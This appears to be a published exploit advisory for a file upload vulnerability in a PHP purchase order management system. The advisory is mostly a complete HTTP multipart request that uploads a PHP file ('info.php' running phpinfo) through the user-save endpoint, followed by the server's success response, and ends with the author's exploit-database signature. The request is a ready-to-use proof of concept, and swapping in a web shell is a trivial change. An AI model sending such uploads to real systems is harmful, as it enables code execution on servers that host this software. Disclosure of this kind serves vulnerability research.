POMS-PHP (by: oretnom23 ) v1.0, Copyright © 2024. All rights reserved - File Upload Vulnerability exploit## Titles: POMS-PHP (by: oretnom23 ) v1.0, Copyright © 2024. All rights reserved - File Upload Vulnerability exploit ## Author: nu11secur1ty ## Date: 11/08/2024 ## Vendor: https://github.com/oretnom23 ## Software: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#google_vignette ## Reference: https://portswigger.net/web-security/file-upload ## Description: The `img` parameter is vulnerable to File Upload vulnerability. This will make it easy for malicious for the already login users to this system to getting sensitive information, or even worse than ever, they can destroy it very easily! STATUS: HIGH- Vulnerability [+]Exploit: ``` POST /purchase_order/classes/Users.php?f=save HTTP/1.1 Host: pwnedhost.com Cookie: PHPSESSID=90lhc202cbb0s5adki1gd5suj0 Content-Length: 709 Sec-Ch-Ua-Platform: "Windows" Accept-Language: en-US,en;q=0.9 Sec-Ch-Ua: "Not?A_Brand";v="99", "Chromium";v="130" Sec-Ch-Ua-Mobile: ?0 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36 Accept: */* Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoIjZa6BqBYZRIp8V Origin: https://pwnedhost.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://pwnedhost.com/purchase_order/admin/?page=user Accept-Encoding: gzip, deflate, br Priority: u=1, i Connection: keep-alive ------WebKitFormBoundaryoIjZa6BqBYZRIp8V Content-Disposition: form-data; name="id" 1 ------WebKitFormBoundaryoIjZa6BqBYZRIp8V Content-Disposition: form-data; name="firstname" Adminstrator ------WebKitFormBoundaryoIjZa6BqBYZRIp8V Content-Disposition: form-data; name="lastname" Admin ------WebKitFormBoundaryoIjZa6BqBYZRIp8V Content-Disposition: form-data; name="username" admin ------WebKitFormBoundaryoIjZa6BqBYZRIp8V Content-Disposition: form-data; name="password" ------WebKitFormBoundaryoIjZa6BqBYZRIp8V Content-Disposition: form-data; name="img"; filename="info.php" Content-Type: application/octet-stream <?php phpinfo(); ?> ------WebKitFormBoundaryoIjZa6BqBYZRIp8V-- ``` [+]Response: ``` HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 08:52:20 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4 X-Powered-By: PHP/8.2.4 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 1 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 1 ``` ## Reproduce: [href](https://www.youtube.com/watch?v=XODY8SSz62c) ## Demo PoC: [href](https://www.nu11secur1ty.com/2024/11/poms-php-by-oretnom23-v10-copyright_8.html) ## Time spent: 00:05:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
Thanks for you comment!
|
{{ x.nick }}
| Date:{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1 {{ x.comment }} |